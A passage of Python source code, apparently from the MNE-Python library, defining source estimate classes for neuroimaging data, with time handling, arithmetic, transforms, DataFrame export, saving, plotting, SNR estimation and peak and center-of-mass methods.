return (self._kernel.shape[0], self._sens_data.shape[1])\n\n @property\n def tmin(self):\n \"\"\"The first timestamp.\"\"\"\n return self._tmin\n\n @tmin.setter\n def tmin(self, value):\n self._tmin = float(value)\n self._update_times()\n\n @property\n def tstep(self):\n \"\"\"The change in time between two consecutive samples (1 / sfreq).\"\"\"\n return self._tstep\n\n @tstep.setter\n def tstep(self, value):\n if value <= 0:\n raise ValueError('.tstep must be greater than 0.')\n self._tstep = float(value)\n self._update_times()\n\n @property\n def times(self):\n \"\"\"A timestamp for each sample.\"\"\"\n return self._times\n\n @times.setter\n def times(self, value):\n raise ValueError('You cannot write to the .times attribute directly. '\n 'This property automatically updates whenever '\n '.tmin, .tstep or .data changes.')\n\n def _update_times(self):\n \"\"\"Update the times attribute after changing tmin, tmax, or tstep.\"\"\"\n self._times = self.tmin + (self.tstep * np.arange(self.shape[-1]))\n self._times.flags.writeable = False\n\n def __add__(self, a):\n \"\"\"Add source estimates.\"\"\"\n stc = self.copy()\n stc += a\n return stc\n\n def __iadd__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data += a.data\n else:\n self.data += a\n return self\n\n def mean(self):\n \"\"\"Make a summary stc file with mean over time points.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc.\n \"\"\"\n out = self.sum()\n out /= len(self.times)\n return out\n\n def sum(self):\n \"\"\"Make a summary stc file with sum over time points.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc.\n \"\"\"\n data = self.data\n tmax = self.tmin + self.tstep * data.shape[-1]\n tmin = (self.tmin + tmax) / 2.\n tstep = tmax - self.tmin\n sum_stc = self.__class__(self.data.sum(axis=-1, keepdims=True),\n vertices=self.vertices, tmin=tmin,\n tstep=tstep, subject=self.subject)\n return sum_stc\n\n def __sub__(self, a):\n \"\"\"Subtract source estimates.\"\"\"\n stc = self.copy()\n stc -= a\n return stc\n\n def __isub__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data -= a.data\n else:\n self.data -= a\n return self\n\n def __truediv__(self, a): # noqa: D105\n return self.__div__(a)\n\n def __div__(self, a): # noqa: D105\n \"\"\"Divide source estimates.\"\"\"\n stc = self.copy()\n stc /= a\n return stc\n\n def __itruediv__(self, a): # noqa: D105\n return self.__idiv__(a)\n\n def __idiv__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data /= a.data\n else:\n self.data /= a\n return self\n\n def __mul__(self, a):\n \"\"\"Multiply source estimates.\"\"\"\n stc = self.copy()\n stc *= a\n return stc\n\n def __imul__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n if isinstance(a, _BaseSourceEstimate):\n _verify_source_estimate_compat(self, a)\n self.data *= a.data\n else:\n self.data *= a\n return self\n\n def __pow__(self, a): # noqa: D105\n stc = self.copy()\n stc **= a\n return stc\n\n def __ipow__(self, a): # noqa: D105\n self._remove_kernel_sens_data_()\n self.data **= a\n return self\n\n def __radd__(self, a): # noqa: D105\n return self + a\n\n def __rsub__(self, a): # noqa: D105\n return self - a\n\n def __rmul__(self, a): # noqa: D105\n return self * a\n\n def __rdiv__(self, a): # noqa: D105\n return self / a\n\n def __neg__(self): # noqa: D105\n \"\"\"Negate the source estimate.\"\"\"\n stc = self.copy()\n stc._remove_kernel_sens_data_()\n stc.data *= -1\n return stc\n\n def __pos__(self): # noqa: D105\n return self\n\n def __abs__(self):\n \"\"\"Compute the absolute value of the data.\n\n Returns\n -------\n stc : instance of _BaseSourceEstimate\n A version of the source estimate, where the data attribute is set\n to abs(self.data).\n \"\"\"\n stc = self.copy()\n stc._remove_kernel_sens_data_()\n stc._data = abs(stc._data)\n return stc\n\n def sqrt(self):\n \"\"\"Take the square root.\n\n Returns\n -------\n stc : instance of SourceEstimate\n A copy of the SourceEstimate with sqrt(data).\n \"\"\"\n return self ** (0.5)\n\n def copy(self):\n \"\"\"Return copy of source estimate instance.\n\n Returns\n -------\n stc : instance of SourceEstimate\n A copy of the source estimate.\n \"\"\"\n return copy.deepcopy(self)\n\n def bin(self, width, tstart=None, tstop=None, func=np.mean):\n \"\"\"Return a source estimate object with data summarized over time bins.\n\n Time bins of ``width`` seconds. This method is intended for\n visualization only. No filter is applied to the data before binning,\n making the method inappropriate as a tool for downsampling data.\n\n Parameters\n ----------\n width : scalar\n Width of the individual bins in seconds.\n tstart : scalar | None\n Time point where the first bin starts. The default is the first\n time point of the stc.\n tstop : scalar | None\n Last possible time point contained in a bin (if the last bin would\n be shorter than width it is dropped). The default is the last time\n point of the stc.\n func : callable\n Function that is applied to summarize the data. Needs to accept a\n numpy.array as first input and an ``axis`` keyword argument.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The binned source estimate.\n \"\"\"\n if tstart is None:\n tstart = self.tmin\n if tstop is None:\n tstop = self.times[-1]\n\n times = np.arange(tstart, tstop + self.tstep, width)\n nt = len(times) - 1\n data = np.empty(self.shape[:-1] + (nt,), dtype=self.data.dtype)\n for i in range(nt):\n idx = (self.times >= times[i]) & (self.times < times[i + 1])\n data[..., i] = func(self.data[..., idx], axis=-1)\n\n tmin = times[0] + width / 2.\n stc = self.copy()\n stc._data = data\n stc.tmin = tmin\n stc.tstep = width\n return stc\n\n def transform_data(self, func, idx=None, tmin_idx=None, tmax_idx=None):\n \"\"\"Get data after a linear (time) transform has been applied.\n\n The transform is applied to each source time course independently.\n\n Parameters\n ----------\n func : callable\n The transform to be applied, including parameters (see, e.g.,\n :func:`functools.partial`). The first parameter of the function is\n the input data. The first return value is the transformed data,\n remaining outputs are ignored. The first dimension of the\n transformed data has to be the same as the first dimension of the\n input data.\n idx : array | None\n Indicices of source time courses for which to compute transform.\n If None, all time courses are used.\n tmin_idx : int | None\n Index of first time point to include. If None, the index of the\n first time point is used.\n tmax_idx : int | None\n Index of the first time point not to include. If None, time points\n up to (and including) the last time point are included.\n\n Returns\n -------\n data_t : ndarray\n The transformed data.\n\n Notes\n -----\n Applying transforms can be significantly faster if the\n SourceEstimate object was created using \"(kernel, sens_data)\", for\n the \"data\" parameter as the transform is applied in sensor space.\n Inverse methods, e.g., \"apply_inverse_epochs\", or \"apply_lcmv_epochs\"\n do this automatically (if possible).\n \"\"\"\n if idx is None:\n # use all time courses by default\n idx = slice(None, None)\n\n if self._kernel is None and self._sens_data is None:\n if self._kernel_removed:\n warn_('Performance can be improved by not accessing the data '\n 'attribute before calling this method.')\n\n # transform source space data directly\n data_t = func(self.data[idx, ..., tmin_idx:tmax_idx])\n\n if isinstance(data_t, tuple):\n # use only first return value\n data_t = data_t[0]\n else:\n # apply transform in sensor space\n sens_data_t = func(self._sens_data[:, tmin_idx:tmax_idx])\n\n if isinstance(sens_data_t, tuple):\n # use only first return value\n sens_data_t = sens_data_t[0]\n\n # apply inverse\n data_shape = sens_data_t.shape\n if len(data_shape) > 2:\n # flatten the last dimensions\n sens_data_t = sens_data_t.reshape(data_shape[0],\n np.prod(data_shape[1:]))\n\n data_t = np.dot(self._kernel[idx, :], sens_data_t)\n\n # restore original shape if necessary\n if len(data_shape) > 2:\n data_t = data_t.reshape(data_t.shape[0], *data_shape[1:])\n\n return data_t\n\n def transform(self, func, idx=None, tmin=None, tmax=None, copy=False):\n \"\"\"Apply linear transform.\n\n The transform is applied to each source time course independently.\n\n Parameters\n ----------\n func : callable\n The transform to be applied, including parameters (see, e.g.,\n :func:`functools.partial`). The first parameter of the function is\n the input data. The first two dimensions of the transformed data\n should be (i) vertices and (ii) time. See Notes for details.\n idx : array | None\n Indices of source time courses for which to compute transform.\n If None, all time courses are used.\n tmin : float | int | None\n First time point to include (ms). If None, self.tmin is used.\n tmax : float | int | None\n Last time point to include (ms). If None, self.tmax is used.\n copy : bool\n If True, return a new instance of SourceEstimate instead of\n modifying the input inplace.\n\n Returns\n -------\n stcs : SourceEstimate | VectorSourceEstimate | list\n The transformed stc or, in the case of transforms which yield\n N-dimensional output (where N > 2), a list of stcs. For a list,\n copy must be True.\n\n Notes\n -----\n Transforms which yield 3D\n output (e.g. time-frequency transforms) are valid, so long as the\n first two dimensions are vertices and time. In this case, the\n copy parameter must be True and a list of\n SourceEstimates, rather than a single instance of SourceEstimate,\n will be returned, one for each index of the 3rd dimension of the\n transformed data. In the case of transforms yielding 2D output\n (e.g. filtering), the user has the option of modifying the input\n inplace (copy = False) or returning a new instance of\n SourceEstimate (copy = True) with the transformed data.\n\n Applying transforms can be significantly faster if the\n SourceEstimate object was created using \"(kernel, sens_data)\", for\n the \"data\" parameter as the transform is applied in sensor space.\n Inverse methods, e.g., \"apply_inverse_epochs\", or \"apply_lcmv_epochs\"\n do this automatically (if possible).\n \"\"\"\n # min and max data indices to include\n times = 1000. * self.times\n t_idx = np.where(_time_mask(times, tmin, tmax, sfreq=self.sfreq))[0]\n if tmin is None:\n tmin_idx = None\n else:\n tmin_idx = t_idx[0]\n\n if tmax is None:\n tmax_idx = None\n else:\n # +1, because upper boundary needs to include the last sample\n tmax_idx = t_idx[-1] + 1\n\n data_t = self.transform_data(func, idx=idx, tmin_idx=tmin_idx,\n tmax_idx=tmax_idx)\n\n # account for change in n_vertices\n if idx is not None:\n idx_lh = idx[idx < len(self.lh_vertno)]\n idx_rh = idx[idx >= len(self.lh_vertno)] - len(self.lh_vertno)\n verts_lh = self.lh_vertno[idx_lh]\n verts_rh = self.rh_vertno[idx_rh]\n else:\n verts_lh = self.lh_vertno\n verts_rh = self.rh_vertno\n verts = [verts_lh, verts_rh]\n\n tmin_idx = 0 if tmin_idx is None else tmin_idx\n tmin = self.times[tmin_idx]\n\n if data_t.ndim > 2:\n # return list of stcs if transformed data has dimensionality > 2\n if copy:\n stcs = [SourceEstimate(data_t[:, :, a], verts, tmin,\n self.tstep, self.subject)\n for a in range(data_t.shape[-1])]\n else:\n raise ValueError('copy must be True if transformed data has '\n 'more than 2 dimensions')\n else:\n # return new or overwritten stc\n stcs = self if not copy else self.copy()\n stcs.vertices = verts\n stcs.data = data_t\n stcs.tmin = tmin\n\n return stcs\n\n @fill_doc\n def to_data_frame(self, index=None, scaling_time=None, scalings=None,\n long_format=False, time_format='ms'):\n \"\"\"Export data in tabular structure as a pandas DataFrame.\n\n Vertices are converted to columns in the DataFrame. By default,\n an additional column \"time\" is added, unless ``index='time'``\n (in which case time values form the DataFrame's index).\n\n Parameters\n ----------\n %(df_index_evk)s\n Defaults to ``None``.\n %(df_scaling_time_deprecated)s\n %(df_scalings)s\n %(df_longform_stc)s\n %(df_time_format)s\n\n .. versionadded:: 0.20\n\n Returns\n -------\n %(df_return)s\n \"\"\"\n # check deprecation\n _check_scaling_time(scaling_time)\n # check pandas once here, instead of in each private utils function\n pd = _check_pandas_installed() # noqa\n # arg checking\n valid_index_args = ['time', 'subject']\n valid_time_formats = ['ms', 'timedelta']\n index = _check_pandas_index_arguments(index, valid_index_args)\n time_format = _check_time_format(time_format, valid_time_formats)\n # get data\n data = self.data.T\n times = self.times\n # prepare extra columns / multiindex\n mindex = list()\n default_index = ['time']\n if self.subject is not None:\n default_index = ['subject', 'time']\n mindex.append(('subject', np.repeat(self.subject, data.shape[0])))\n times = _convert_times(self, times, time_format)\n mindex.append(('time', times))\n # triage surface vs volume source estimates\n if isinstance(self.vertices, list):\n col_names = list()\n for ii, vertno in enumerate(self.vertices):\n col_names.extend(['{}_{}'.format(('LH', 'RH')[ii], vert)\n for vert in vertno])\n else:\n col_names = ['VOL_{}'.format(vert) for vert in self.vertices]\n # build DataFrame\n df = _build_data_frame(self, data, None, long_format, mindex, index,\n default_index=default_index,\n col_names=col_names, col_kind='source')\n return df\n\n\ndef _center_of_mass(vertices, values, hemi, surf, subject, subjects_dir,\n restrict_vertices):\n \"\"\"Find the center of mass on a surface.\"\"\"\n if (values == 0).all() or (values < 0).any():\n raise ValueError('All values must be non-negative and at least one '\n 'must be non-zero, cannot compute COM')\n subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)\n surf = read_surface(op.join(subjects_dir, subject, 'surf',\n hemi + '.' + surf))\n if restrict_vertices is True:\n restrict_vertices = vertices\n elif restrict_vertices is False:\n restrict_vertices = np.arange(surf[0].shape[0])\n elif isinstance(restrict_vertices, SourceSpaces):\n idx = 1 if restrict_vertices.kind == 'surface' and hemi == 'rh' else 0\n restrict_vertices = restrict_vertices[idx]['vertno']\n else:\n restrict_vertices = np.array(restrict_vertices, int)\n pos = surf[0][vertices, :].T\n c_o_m = np.sum(pos * values, axis=1) / np.sum(values)\n vertex = np.argmin(np.sqrt(np.mean((surf[0][restrict_vertices, :] -\n c_o_m) ** 2, axis=1)))\n vertex = restrict_vertices[vertex]\n return vertex\n\n\n@fill_doc\nclass _BaseSurfaceSourceEstimate(_BaseSourceEstimate):\n \"\"\"Abstract base class for surface source estimates.\n\n Parameters\n ----------\n data : array\n The data in source space.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n data : array\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n \"\"\"\n\n _data_ndim = 2\n _src_type = 'surface'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n\n if not (isinstance(vertices, list) and len(vertices) == 2):\n raise ValueError('Vertices must be a list containing two '\n 'numpy arrays, got type %s (%s)'\n % (type(vertices), vertices))\n\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @property\n def lh_data(self):\n \"\"\"Left hemisphere data.\"\"\"\n return self.data[:len(self.lh_vertno)]\n\n @property\n def rh_data(self):\n \"\"\"Right hemisphere data.\"\"\"\n return self.data[len(self.lh_vertno):]\n\n @property\n def lh_vertno(self):\n \"\"\"Left hemisphere vertno.\"\"\"\n return self.vertices[0]\n\n @property\n def rh_vertno(self):\n \"\"\"Right hemisphere vertno.\"\"\"\n return self.vertices[1]\n\n def _hemilabel_stc(self, label):\n if label.hemi == 'lh':\n stc_vertices = self.vertices[0]\n else:\n stc_vertices = self.vertices[1]\n\n # find index of the Label's vertices\n idx = np.nonzero(np.in1d(stc_vertices, label.vertices))[0]\n\n # find output vertices\n vertices = stc_vertices[idx]\n\n # find data\n if label.hemi == 'rh':\n values = self.data[idx + len(self.vertices[0])]\n else:\n values = self.data[idx]\n\n return vertices, values\n\n def in_label(self, label):\n \"\"\"Get a source estimate object restricted to a label.\n\n SourceEstimate contains the time course of\n activation of all sources inside the label.\n\n Parameters\n ----------\n label : Label | BiHemiLabel\n The label (as created for example by mne.read_label). If the label\n does not match any sources in the SourceEstimate, a ValueError is\n raised.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The source estimate restricted to the given label.\n \"\"\"\n # make sure label and stc are compatible\n if label.subject is not None and self.subject is not None \\\n and label.subject != self.subject:\n raise RuntimeError('label and stc must have same subject names, '\n 'currently \"%s\" and \"%s\"' % (label.subject,\n self.subject))\n\n if label.hemi == 'both':\n lh_vert, lh_val = self._hemilabel_stc(label.lh)\n rh_vert, rh_val = self._hemilabel_stc(label.rh)\n vertices = [lh_vert, rh_vert]\n values = np.vstack((lh_val, rh_val))\n elif label.hemi == 'lh':\n lh_vert, values = self._hemilabel_stc(label)\n vertices = [lh_vert, np.array([], int)]\n elif label.hemi == 'rh':\n rh_vert, values = self._hemilabel_stc(label)\n vertices = [np.array([], int), rh_vert]\n else:\n raise TypeError(\"Expected Label or BiHemiLabel; got %r\" % label)\n\n if sum([len(v) for v in vertices]) == 0:\n raise ValueError('No vertices match the label in the stc file')\n\n label_stc = self.__class__(values, vertices=vertices, tmin=self.tmin,\n tstep=self.tstep, subject=self.subject)\n return label_stc\n\n def expand(self, vertices):\n \"\"\"Expand SourceEstimate to include more vertices.\n\n This will add rows to stc.data (zero-filled) and modify stc.vertices\n to include all vertices in stc.vertices and the input vertices.\n\n Parameters\n ----------\n vertices : list of array\n New vertices to add. Can also contain old values.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc (note: method operates inplace).\n \"\"\"\n if not isinstance(vertices, list):\n raise TypeError('vertices must be a list')\n if not len(self.vertices) == len(vertices):\n raise ValueError('vertices must have the same length as '\n 'stc.vertices')\n\n # can no longer use kernel and sensor data\n self._remove_kernel_sens_data_()\n\n inserters = list()\n offsets = [0]\n for vi, (v_old, v_new) in enumerate(zip(self.vertices, vertices)):\n v_new = np.setdiff1d(v_new, v_old)\n inds = np.searchsorted(v_old, v_new)\n # newer numpy might overwrite inds after np.insert, copy here\n inserters += [inds.copy()]\n offsets += [len(v_old)]\n self.vertices[vi] = np.insert(v_old, inds, v_new)\n inds = [ii + offset for ii, offset in zip(inserters, offsets[:-1])]\n inds = np.concatenate(inds)\n new_data = np.zeros((len(inds),) + self.data.shape[1:])\n self.data = np.insert(self.data, inds, new_data, axis=0)\n return self\n\n @verbose\n def to_original_src(self, src_orig, subject_orig=None,\n subjects_dir=None, verbose=None):\n \"\"\"Get a source estimate from morphed source to the original subject.\n\n Parameters\n ----------\n src_orig : instance of SourceSpaces\n The original source spaces that were morphed to the current\n subject.\n subject_orig : str | None\n The original subject. For most source spaces this shouldn't need\n to be provided, since it is stored in the source space itself.\n %(subjects_dir)s\n %(verbose_meth)s\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The transformed source estimate.\n\n See Also\n --------\n morph_source_spaces\n\n Notes\n -----\n .. versionadded:: 0.10.0\n \"\"\"\n if self.subject is None:\n raise ValueError('stc.subject must be set')\n src_orig = _ensure_src(src_orig, kind='surface')\n subject_orig = _ensure_src_subject(src_orig, subject_orig)\n data_idx, vertices = _get_morph_src_reordering(\n self.vertices, src_orig, subject_orig, self.subject, subjects_dir)\n return self.__class__(self._data[data_idx], vertices,\n self.tmin, self.tstep, subject_orig)\n\n\n@fill_doc\nclass SourceEstimate(_BaseSurfaceSourceEstimate):\n \"\"\"Container for surface source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. When it is a single array, the\n left hemisphere is stored in data[:len(vertices[0])] and the right\n hemisphere is stored in data[-len(vertices[1]):].\n When data is a tuple, it contains two arrays:\n\n - \"kernel\" shape (n_vertices, n_sensors) and\n - \"sens_data\" shape (n_sensors, n_times).\n\n In this case, the source space data corresponds to\n ``np.dot(kernel, sens_data)``.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array, shape (2,)\n The indices of the dipoles in the left and right source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n VectorSourceEstimate : A container for vector source estimates.\n VolSourceEstimate : A container for volume source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n \"\"\"\n\n @verbose\n def save(self, fname, ftype='stc', verbose=None):\n \"\"\"Save the source estimates to a file.\n\n Parameters\n ----------\n fname : str\n The stem of the file name. The file names used for surface source\n spaces are obtained by adding \"-lh.stc\" and \"-rh.stc\" (or \"-lh.w\"\n and \"-rh.w\") to the stem provided, for the left and the right\n hemisphere, respectively.\n ftype : str\n File format to use. Allowed values are \"stc\" (default), \"w\",\n and \"h5\". The \"w\" format only supports a single time point.\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n _check_option('ftype', ftype, ['stc', 'w', 'h5'])\n\n lh_data = self.data[:len(self.lh_vertno)]\n rh_data = self.data[-len(self.rh_vertno):]\n\n if ftype == 'stc':\n logger.info('Writing STC to disk...')\n _write_stc(fname + '-lh.stc', tmin=self.tmin, tstep=self.tstep,\n vertices=self.lh_vertno, data=lh_data)\n _write_stc(fname + '-rh.stc', tmin=self.tmin, tstep=self.tstep,\n vertices=self.rh_vertno, data=rh_data)\n\n elif ftype == 'w':\n if self.shape[1] != 1:\n raise ValueError('w files can only contain a single time '\n 'point')\n logger.info('Writing STC to disk (w format)...')\n _write_w(fname + '-lh.w', vertices=self.lh_vertno,\n data=lh_data[:, 0])\n _write_w(fname + '-rh.w', vertices=self.rh_vertno,\n data=rh_data[:, 0])\n\n elif ftype == 'h5':\n super().save(fname)\n logger.info('[done]')\n\n @copy_function_doc_to_method_doc(plot_source_estimates)\n def plot(self, subject=None, surface='inflated', hemi='lh',\n colormap='auto', time_label='auto', smoothing_steps=10,\n transparent=True, alpha=1.0, time_viewer='auto',\n subjects_dir=None,\n figure=None, views='lat', colorbar=True, clim='auto',\n cortex=\"classic\", size=800, background=\"black\",\n foreground=\"white\", initial_time=None, time_unit='s',\n backend='auto', spacing='oct6', title=None,\n show_traces='auto', verbose=None):\n brain = plot_source_estimates(\n self, subject, surface=surface, hemi=hemi, colormap=colormap,\n time_label=time_label, smoothing_steps=smoothing_steps,\n transparent=transparent, alpha=alpha, time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure, views=views,\n colorbar=colorbar, clim=clim, cortex=cortex, size=size,\n background=background, foreground=foreground,\n initial_time=initial_time, time_unit=time_unit, backend=backend,\n spacing=spacing, title=title, show_traces=show_traces,\n verbose=verbose)\n return brain\n\n @verbose\n def extract_label_time_course(self, labels, src, mode='mean_flip',\n allow_empty=False, verbose=None):\n \"\"\"Extract label time courses for lists of labels.\n\n This function will extract one time course for each label. The way the\n time courses are extracted depends on the mode parameter.\n\n Parameters\n ----------\n %(eltc_labels)s\n %(eltc_src)s\n %(eltc_mode)s\n %(eltc_allow_empty)s\n %(verbose_meth)s\n\n Returns\n -------\n label_tc : array, shape=(n_labels, n_times)\n Extracted time course for each label.\n\n See Also\n --------\n extract_label_time_course : Extract time courses for multiple STCs.\n\n Notes\n -----\n %(eltc_mode_notes)s\n \"\"\"\n label_tc = extract_label_time_course(\n self, labels, src, mode=mode, return_generator=False,\n allow_empty=allow_empty, verbose=verbose)\n\n return label_tc\n\n @verbose\n def estimate_snr(self, info, fwd, cov, verbose=None):\n r\"\"\"Compute time-varying SNR in the source space.\n\n This function should only be used with source estimates with units\n nanoAmperes (i.e., MNE-like solutions, *not* dSPM or sLORETA).\n\n .. warning:: This function currently only works properly for fixed\n orientation.\n\n Parameters\n ----------\n info : instance Info\n The measurement info.\n fwd : instance of Forward\n The forward solution used to create the source estimate.\n cov : instance of Covariance\n The noise covariance used to estimate the resting cortical\n activations. Should be an evoked covariance, not empty room.\n %(verbose)s\n\n Returns\n -------\n snr_stc : instance of SourceEstimate\n The source estimate with the SNR computed.\n\n Notes\n -----\n We define the SNR in decibels for each source location at each\n time point as:\n\n .. math::\n\n {\\rm SNR} = 10\\log_10[\\frac{a^2}{N}\\sum_k\\frac{b_k^2}{s_k^2}]\n\n where :math:`\\\\b_k` is the signal on sensor :math:`k` provided by the\n forward model for a source with unit amplitude, :math:`a` is the\n source amplitude, :math:`N` is the number of sensors, and\n :math:`s_k^2` is the noise variance on sensor :math:`k`.\n\n References\n ----------\n .. [1] Goldenholz, D. M., Ahlfors, S. P., Hämäläinen, M. S., Sharon,\n D., Ishitobi, M., Vaina, L. M., & Stufflebeam, S. M. (2009).\n Mapping the Signal-To-Noise-Ratios of Cortical Sources in\n Magnetoencephalography and Electroencephalography.\n Human Brain Mapping, 30(4), 1077–1086. doi:10.1002/hbm.20571\n \"\"\"\n from .forward import convert_forward_solution, Forward\n from .minimum_norm.inverse import _prepare_forward\n _validate_type(fwd, Forward, 'fwd')\n _validate_type(info, Info, 'info')\n _validate_type(cov, Covariance, 'cov')\n _check_stc_units(self)\n if (self.data >= 0).all():\n warn_('This STC appears to be from free orientation, currently SNR'\n ' function is valid only for fixed orientation')\n\n fwd = convert_forward_solution(fwd, surf_ori=True, force_fixed=False)\n\n # G is gain matrix [ch x src], cov is noise covariance [ch x ch]\n G, _, _, _, _, _, _, cov, _ = _prepare_forward(\n fwd, info, cov, fixed=True, loose=0, rank=None, pca=False,\n use_cps=True, exp=None, limit_depth_chs=False, combine_xyz='fro',\n allow_fixed_depth=False, limit=None)\n G = G['sol']['data']\n n_channels = cov['dim'] # number of sensors/channels\n b_k2 = (G * G).T\n s_k2 = np.diag(cov['data'])\n scaling = (1 / n_channels) * np.sum(b_k2 / s_k2, axis=1, keepdims=True)\n snr_stc = self.copy()\n snr_stc._data[:] = 10 * np.log10((self.data * self.data) * scaling)\n return snr_stc\n\n def get_peak(self, hemi=None, tmin=None, tmax=None, mode='abs',\n vert_as_index=False, time_as_index=False):\n \"\"\"Get location and latency of peak amplitude.\n\n Parameters\n ----------\n hemi : {'lh', 'rh', None}\n The hemi to be considered. If None, the entire source space is\n considered.\n tmin : float | None\n The minimum point in time to be considered for peak getting.\n tmax : float | None\n The maximum point in time to be considered for peak getting.\n mode : {'pos', 'neg', 'abs'}\n How to deal with the sign of the data. If 'pos' only positive\n values will be considered. If 'neg' only negative values will\n be considered. If 'abs' absolute values will be considered.\n Defaults to 'abs'.\n vert_as_index : bool\n Whether to return the vertex index instead of of its ID.\n Defaults to False.\n time_as_index : bool\n Whether to return the time index instead of the latency.\n Defaults to False.\n\n Returns\n -------\n pos : int\n The vertex exhibiting the maximum response, either ID or index.\n latency : float | int\n The time point of the maximum response, either latency in seconds\n or index.\n \"\"\"\n data = {'lh': self.lh_data, 'rh': self.rh_data, None: self.data}[hemi]\n vertno = {'lh': self.lh_vertno, 'rh': self.rh_vertno,\n None: np.concatenate(self.vertices)}[hemi]\n\n vert_idx, time_idx, _ = _get_peak(data, self.times, tmin, tmax, mode)\n\n return (vert_idx if vert_as_index else vertno[vert_idx],\n time_idx if time_as_index else self.times[time_idx])\n\n @fill_doc\n def center_of_mass(self, subject=None, hemi=None, restrict_vertices=False,\n subjects_dir=None, surf='sphere'):\n \"\"\"Compute the center of mass of activity.\n\n This function computes the spatial center of mass on the surface\n as well as the temporal center of mass as in [1]_.\n\n .. note:: All activity must occur in a single hemisphere, otherwise\n an error is raised. The \"mass\" of each point in space for\n computing the spatial center of mass is computed by summing\n across time, and vice-versa for each point in time in\n computing the temporal center of mass. This is useful for\n quantifying spatio-temporal cluster locations, especially\n when combined with :func:`mne.vertex_to_mni`.\n\n Parameters\n ----------\n subject : str | None\n The subject the stc is defined for.\n hemi : int, or None\n Calculate the center of mass for the left (0) or right (1)\n hemisphere. If None, one of the hemispheres must be all zeroes,\n and the center of mass will be calculated for the other\n hemisphere (useful for getting COM for clusters).\n restrict_vertices : bool | array of int | instance of SourceSpaces\n If True, returned vertex will be one from stc. Otherwise, it could\n be any vertex from surf. If an array of int, the returned vertex\n will come from that array. If instance of SourceSpaces (as of\n 0.13), the returned vertex will be from the given source space.\n For most accuruate estimates, do not restrict vertices.\n %(subjects_dir)s\n surf : str\n The surface to use for Euclidean distance center of mass\n finding. The default here is \"sphere\", which finds the center\n of mass on the spherical surface to help avoid potential issues\n with cortical folding.\n\n Returns\n -------\n vertex : int\n Vertex of the spatial center of mass for the inferred hemisphere,\n with each vertex weighted by the sum of the stc across time. For a\n boolean stc, then, this would be weighted purely by the duration\n each vertex was active.\n hemi : int\n Hemisphere the vertex was taken from.\n t : float\n Time of the temporal center of mass (weighted by the sum across\n source vertices).\n\n See Also\n --------\n mne.Label.center_of_mass\n mne.vertex_to_mni\n\n References\n ----------\n .. [1] Larson and Lee, \"The cortical dynamics underlying effective\n switching of auditory spatial attention\", NeuroImage 2012.\n \"\"\"\n if not isinstance(surf, str):\n raise TypeError('surf must be a string, got %s' % (type(surf),))\n subject = _check_subject(self.subject, subject)\n if np.any(self.data < 0):\n raise ValueError('Cannot compute COM with negative values')\n values = np.sum(self.data, axis=1) # sum across time\n vert_inds = [np.arange(len(self.vertices[0])),\n np.arange(len(self.vertices[1])) + len(self.vertices[0])]\n if hemi is None:\n hemi = np.where(np.array([np.sum(values[vi])\n for vi in vert_inds]))[0]\n if not len(hemi) == 1:\n raise ValueError('Could not infer hemisphere')\n hemi = hemi[0]\n _check_option('hemi', hemi, [0, 1])\n vertices = self.vertices[hemi]\n values = values[vert_inds[hemi]] # left or right\n del vert_inds\n vertex = _center_of_mass(\n vertices, values, hemi=['lh', 'rh'][hemi], surf=surf,\n subject=subject, subjects_dir=subjects_dir,\n restrict_vertices=restrict_vertices)\n # do time center of mass by using the values across space\n masses = np.sum(self.data, axis=0).astype(float)\n t_ind = np.sum(masses * np.arange(self.shape[1])) / np.sum(masses)\n t = self.tmin + self.tstep * t_ind\n return vertex, hemi, t\n\n\nclass _BaseVectorSourceEstimate(_BaseSourceEstimate):\n _data_ndim = 3\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n assert hasattr(self, '_scalar_class')\n 